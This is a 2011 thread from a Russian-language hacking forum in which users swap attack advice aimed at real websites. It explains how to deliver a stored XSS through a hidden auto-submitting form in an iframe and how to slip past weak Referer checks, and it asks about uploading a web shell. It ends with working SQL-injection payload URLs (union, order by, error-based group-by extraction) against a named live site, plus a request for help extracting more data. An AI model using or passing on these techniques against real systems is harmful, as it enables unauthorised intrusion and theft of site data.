17.08.2011, 03:53
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от .::f-duck::.
можно-ли как-то сделать так, что бы не надо было впаривать юзерам самим ввести js?
Можно
p.s.: если хочешь услышать более подробный ответ, задай более подробный вопрос
|
|
|
17.08.2011, 03:57
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
http://gb.anekdot.ru/scripts/gb.php?component=gb&id=' так и не понял что за бага/
разъясните что за фрукт пожалуйста
|
|
|
|
17.08.2011, 04:09
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от Boobby
разъясните что за фрукт пожалуйста
Это не то, о чем ты подумал. Там intval на id
|
|
|
|
17.08.2011, 14:42
|
|
Новичок
Регистрация: 09.08.2011
Сообщений: 5
Провел на форуме:
931
Репутация:
0
|
|
обезательно делать так что бы выбило ошибку для пхп инъекции? или можно попробовать залить шелл вставив его сюда nds.com/index.php?view=.......
|
|
|
|
17.08.2011, 15:01
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от .::f-duck::.
Есть чятик. В чятике есть функция создания своего канала. Вот в поле "название канала" можно вставлять любой javascript, но уже потом, после создания, в title созданного канала это все дело фильтруется. Но при первичном отсылании запроса - js исполняется. Внимание вопрос: можно-ли как-то сделать так, что бы не надо было впаривать юзерам самим ввести js?
Если нет проверки referer, капчи, токенов - то можно. Это POST XSS. Нужно создать HTML файл с зловредной формой, и написать яваскрипт отправляющий её на сервер. Если всё получиться, то спрятать её в IFrame на каком ни будь сайте.
P.S. Можешь стукнуть в ПМ.
|
|
|
|
17.08.2011, 15:30
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
Провел на форуме:
30555
Репутация:
85
|
|
Сообщение от None
Если нет проверки referer, капчи, токенов - то можно
Если есть тоже можно
Сообщение от None
Это POST XSS
Там где пост, и гет недалек, скорее всего работает и то и другое, другое дело что когда есть гет то не факт что есть пост, данные в пост практически всегда фильтруются лучше гет
|
|
|
|
17.08.2011, 17:21
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от eclipse
Если есть тоже
можно
Там где пост, и гет недалек, скорее всего работает и то и другое, другое дело что когда есть гет то не факт что есть пост, данные в пост практически всегда фильтруются лучше гет Первое - Там совсем не то. Совсем нельзя А в той статье просто рассказываться использование XSS помимо кражи кук.
//Если уж есть XSS, подходящая к твоей статье, нет смысла использовать эту.
Кроме того, существуют кривые фильтры на проверку REFERER, будут пропускать например такое:
Код:
https://forum.antichat.net/qwerty
in
https://xakep.ru/forum.antichat.net/qwerty
А токены могут вовсе не проверяться.
Другое дело - XSS уже есть, но куки защищены по IP. В этом случае нужно ичпользовать что то нестандартное, от отправки запросов до прикручивания антигейта к капче(JavaScript).
UDP для M_Script:
Я прикручивал Разуметься через серверного посредника(PHP, Perl...).
|
|
|
|
17.08.2011, 17:44
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512
Репутация:
0
|
|
Сообщение от eclipse
Если есть тоже можно
Он имел ввиду защиту именно в запросе, которым внедряется код. Есть защита -> нет XSS -> нет обхода защиты.
Сообщение от eclipse
данные в пост практически всегда фильтруются лучше гет
Откуда такая статистика?
Сообщение от XAMEHA
до прикручивания антигейта к капче(JavaScript)
Преувеличил немного возможности JS =)
|
|
|
|
17.08.2011, 19:37
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
Провел на форуме:
30555
Репутация:
85
|
|
Сообщение от None
Откуда такая статистика?
А ты посчитай сколько я выложил тут XSS
ХАМЕНА, M_Script, На счет использования обхода внутри XSS, извиняйте, я вас не понял, мне показалось что XSS уже есть))
|
|
|
|
18.08.2011, 03:04
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Нарвался на одну интересную скулю.
Код:
http://sotchi-2014.info/content.php?id=1'
Пробовал сначала крутить через union, но скрипт грязно ругнулся
Код:
http://sotchi-2014.info/content.php?id=-999'+union+select+1+--+
The used SELECT statements have a different number of columns
В принципе я читал об объединение запросов и понимаю, что тут косяк в нессответствии столбцов при втором запросе.
Но опять же следующий запрос выводится корректно
Код:
http://sotchi-2014.info/content.php?id=-999'+order+by+1+--+ TRUE
http://sotchi-2014.info/content.php?id=-999'+order+by+2+--+ FALSE
Что навело на мысль, что колонка всё таки 1.
Далее попробовал крутануть через другой метод.
Код:
http://sotchi-2014.info/content.php?id=5'+or+1+group+by+concat((database()),floor(rand(0)*2))+having+min(0)+or+1+--+
БД, юзверя, и версию выводит корректно.
На попытку вывести что либо ещё ругается на СЕЛЕКТ.
Подскажите, каким путём докрутить данную скулю ? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
